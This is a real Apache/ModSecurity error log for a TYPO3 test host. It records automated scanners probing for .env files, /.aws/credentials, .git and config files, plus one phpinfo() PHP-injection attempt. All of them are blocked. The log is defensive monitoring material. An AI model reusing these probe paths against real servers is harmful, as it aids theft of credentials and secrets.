[Fri Aug 08 18:50:50.991285 2025] [:error] [pid 1791146] [client 185.177.72.202:13044] [client 185.177.72.202] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aJYq6pzngu819Zze44FPVQAAAAA"]
[Fri Aug 08 18:50:50.991543 2025] [:error] [pid 1791146] [client 185.177.72.202:13044] [client 185.177.72.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aJYq6pzngu819Zze44FPVQAAAAA"]
[Fri Aug 08 18:50:50.991707 2025] [:error] [pid 1791146] [client 185.177.72.202:13044] [client 185.177.72.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aJYq6pzngu819Zze44FPVQAAAAA"]
[Fri Aug 08 18:50:51.014029 2025] [:error] [pid 1791146] [client 185.177.72.202:13044] [client 185.177.72.202] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aJYq65zngu819Zze44FPVgAAAAA"]
[Fri Aug 08 18:50:51.014258 2025] [:error] [pid 1791146] [client 185.177.72.202:13044] [client 185.177.72.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aJYq65zngu819Zze44FPVgAAAAA"]
[Fri Aug 08 18:50:51.014450 2025] [:error] [pid 1791146] [client 185.177.72.202:13044] [client 185.177.72.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aJYq65zngu819Zze44FPVgAAAAA"]
[Fri Aug 08 18:50:51.036915 2025] [:error] [pid 1791146] [client 185.177.72.202:13044] [client 185.177.72.202] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aJYq65zngu819Zze44FPVwAAAAA"]
[Fri Aug 08 18:50:51.037163 2025] [:error] [pid 1791146] [client 185.177.72.202:13044] [client 185.177.72.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aJYq65zngu819Zze44FPVwAAAAA"]
[Fri Aug 08 18:50:51.037340 2025] [:error] [pid 1791146] [client 185.177.72.202:13044] [client 185.177.72.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aJYq65zngu819Zze44FPVwAAAAA"]
[Fri Aug 08 18:50:51.059634 2025] [:error] [pid 1791146] [client 185.177.72.202:13044] [client 185.177.72.202] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aJYq65zngu819Zze44FPWAAAAAA"]
[Fri Aug 08 18:50:51.059866 2025] [:error] [pid 1791146] [client 185.177.72.202:13044] [client 185.177.72.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aJYq65zngu819Zze44FPWAAAAAA"]
[Fri Aug 08 18:50:51.060052 2025] [:error] [pid 1791146] [client 185.177.72.202:13044] [client 185.177.72.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aJYq65zngu819Zze44FPWAAAAAA"]
[Fri Aug 08 18:50:51.451603 2025] [:error] [pid 1791146] [client 185.177.72.202:13044] [client 185.177.72.202] ModSecurity: Warning. Pattern match "(?i)\\\\b(?:s(?:e(?:t(?:_(?:e(?:xception|rror)_handler|magic_quotes_runtime|include_path)|defaultstub)|ssion_s(?:et_save_handler|tart))|qlite_(?:(?:(?:unbuffered|single|array)_)?query|create_(?:aggregate|function)|p?open|exec)|tr(?:eam_(?:context_create| ..." at ARGS:. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "350"] [id "933160"] [msg "PHP Injection Attack: High-Risk PHP Function Call Found"] [data "Matched Data: phpinfo() found within ARGS:: phpinfo()"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "surf.test.indacotrentino.com"] [uri "/index.php"] [unique_id "aJYq65zngu819Zze44FPYgAAAAA"]
[Fri Aug 08 18:50:51.451906 2025] [:error] [pid 1791146] [client 185.177.72.202:13044] [client 185.177.72.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/index.php"] [unique_id "aJYq65zngu819Zze44FPYgAAAAA"]
[Fri Aug 08 18:50:51.453300 2025] [:error] [pid 1791146] [client 185.177.72.202:13044] [client 185.177.72.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/index.php"] [unique_id "aJYq65zngu819Zze44FPYgAAAAA"]
[Fri Aug 08 18:50:51.747784 2025] [authz_core:error] [pid 1791146] [client 185.177.72.202:13044] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/application.yml
[Fri Aug 08 18:50:51.810074 2025] [authz_core:error] [pid 1791146] [client 185.177.72.202:13044] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/src
[Fri Aug 08 18:50:51.832654 2025] [authz_core:error] [pid 1791146] [client 185.177.72.202:13044] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.bak
[Fri Aug 08 18:50:51.855396 2025] [:error] [pid 1791146] [client 185.177.72.202:13044] [client 185.177.72.202] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_backup.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_backup.txt"] [unique_id "aJYq65zngu819Zze44FPbgAAAAA"]
[Fri Aug 08 18:50:51.855669 2025] [:error] [pid 1791146] [client 185.177.72.202:13044] [client 185.177.72.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_backup.txt"] [unique_id "aJYq65zngu819Zze44FPbgAAAAA"]
[Fri Aug 08 18:50:51.855841 2025] [:error] [pid 1791146] [client 185.177.72.202:13044] [client 185.177.72.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_backup.txt"] [unique_id "aJYq65zngu819Zze44FPbgAAAAA"]
[Fri Aug 08 18:50:51.956004 2025] [authz_core:error] [pid 1791146] [client 185.177.72.202:13044] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/settings.bak
[Fri Aug 08 18:50:51.978811 2025] [:error] [pid 1791146] [client 185.177.72.202:13044] [client 185.177.72.202] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aJYq65zngu819Zze44FPcgAAAAA"]
[Fri Aug 08 18:50:51.979039 2025] [:error] [pid 1791146] [client 185.177.72.202:13044] [client 185.177.72.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aJYq65zngu819Zze44FPcgAAAAA"]
[Fri Aug 08 18:50:51.979195 2025] [:error] [pid 1791146] [client 185.177.72.202:13044] [client 185.177.72.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aJYq65zngu819Zze44FPcgAAAAA"]
[Fri Aug 08 18:50:52.001565 2025] [:error] [pid 1791146] [client 185.177.72.202:13044] [client 185.177.72.202] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aJYq7Jzngu819Zze44FPcwAAAAA"]
[Fri Aug 08 18:50:52.001795 2025] [:error] [pid 1791146] [client 185.177.72.202:13044] [client 185.177.72.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aJYq7Jzngu819Zze44FPcwAAAAA"]
[Fri Aug 08 18:50:52.001977 2025] [:error] [pid 1791146] [client 185.177.72.202:13044] [client 185.177.72.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aJYq7Jzngu819Zze44FPcwAAAAA"]
[Fri Aug 08 18:50:52.024203 2025] [authz_core:error] [pid 1791146] [client 185.177.72.202:13044] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.yaml
[Fri Aug 08 18:50:52.046626 2025] [authz_core:error] [pid 1791146] [client 185.177.72.202:13044] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/settings.yaml
[Fri Aug 08 18:50:52.068913 2025] [authz_core:error] [pid 1791146] [client 185.177.72.202:13044] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/helm
[Fri Aug 08 18:50:52.634466 2025] [:error] [pid 1791146] [client 185.177.72.202:13044] [client 185.177.72.202] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.next/static/development/pages/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.next/static/development/pages/.env"] [unique_id "aJYq7Jzngu819Zze44FPhQAAAAA"]
[Fri Aug 08 18:50:52.634706 2025] [:error] [pid 1791146] [client 185.177.72.202:13044] [client 185.177.72.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.next/static/development/pages/.env"] [unique_id "aJYq7Jzngu819Zze44FPhQAAAAA"]
[Fri Aug 08 18:50:52.634861 2025] [:error] [pid 1791146] [client 185.177.72.202:13044] [client 185.177.72.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.next/static/development/pages/.env"] [unique_id "aJYq7Jzngu819Zze44FPhQAAAAA"]
[Fri Aug 08 18:50:52.735663 2025] [:error] [pid 1791146] [client 185.177.72.202:13044] [client 185.177.72.202] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.output/server/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.output/server/.env"] [unique_id "aJYq7Jzngu819Zze44FPiAAAAAA"]
[Fri Aug 08 18:50:52.735910 2025] [:error] [pid 1791146] [client 185.177.72.202:13044] [client 185.177.72.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.output/server/.env"] [unique_id "aJYq7Jzngu819Zze44FPiAAAAAA"]
[Fri Aug 08 18:50:52.736074 2025] [:error] [pid 1791146] [client 185.177.72.202:13044] [client 185.177.72.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.output/server/.env"] [unique_id "aJYq7Jzngu819Zze44FPiAAAAAA"]
[Sat Aug 09 04:13:56.798997 2025] [authz_core:error] [pid 1817242] [client 207.154.197.113:45958] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/server-status
[Sat Aug 09 04:13:57.316478 2025] [:error] [pid 1817243] [client 207.154.197.113:45986] [client 207.154.197.113] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aJau5aOhwtXACoBdcZpT0gAAAAg"]
[Sat Aug 09 04:13:57.316720 2025] [:error] [pid 1817243] [client 207.154.197.113:45986] [client 207.154.197.113] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aJau5aOhwtXACoBdcZpT0gAAAAg"]
[Sat Aug 09 04:13:57.316884 2025] [:error] [pid 1817243] [client 207.154.197.113:45986] [client 207.154.197.113] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aJau5aOhwtXACoBdcZpT0gAAAAg"]
[Sat Aug 09 04:13:57.372057 2025] [:error] [pid 1817245] [client 207.154.197.113:45994] [client 207.154.197.113] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJau5WBNKNxr032Gq1mcLAAAAAo"]
[Sat Aug 09 04:13:57.372303 2025] [:error] [pid 1817245] [client 207.154.197.113:45994] [client 207.154.197.113] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJau5WBNKNxr032Gq1mcLAAAAAo"]
[Sat Aug 09 04:13:57.372468 2025] [:error] [pid 1817245] [client 207.154.197.113:45994] [client 207.154.197.113] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJau5WBNKNxr032Gq1mcLAAAAAo"]
[Sat Aug 09 04:13:57.425496 2025] [authz_core:error] [pid 1817243] [client 207.154.197.113:45998] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sat Aug 09 06:06:21.781700 2025] [:error] [pid 1816104] [client 185.177.72.104:59520] [client 185.177.72.104] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJbJPZMSsodCmvqA9SDyJgAAAAQ"]
[Sat Aug 09 06:06:21.782076 2025] [:error] [pid 1816104] [client 185.177.72.104:59520] [client 185.177.72.104] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJbJPZMSsodCmvqA9SDyJgAAAAQ"]
